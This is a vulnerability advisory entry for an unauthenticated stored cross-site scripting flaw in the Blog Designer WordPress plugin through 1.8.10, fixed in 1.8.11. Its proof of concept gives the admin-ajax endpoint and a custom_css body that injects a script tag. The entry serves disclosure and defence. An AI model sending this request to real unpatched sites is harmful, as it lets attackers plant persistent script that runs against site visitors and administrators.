Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting (XSS)



Proof of Concept
Send POST request to: /wp-admin/admin-ajax.php?action=save&updated=true

With request body: custom_css=</style><script>confirm(1)</script><style>

Affects Plugin

fixed in version 1.8.11

References

URL https://www.webarxsecurity.com/wordpress-plugin-blog-designer/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Luka Sikic
Submitter WebARX Security
Submitter Website https://www.webarxsecurity.com
Submitter Twitter webarx_security
Views 8247
Verified No
WPVDB ID 9266

Timeline

Publicly Published 2019-05-01 (5 months ago)
Added 2019-05-02 (5 months ago)
Last Updated 2019-05-02 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin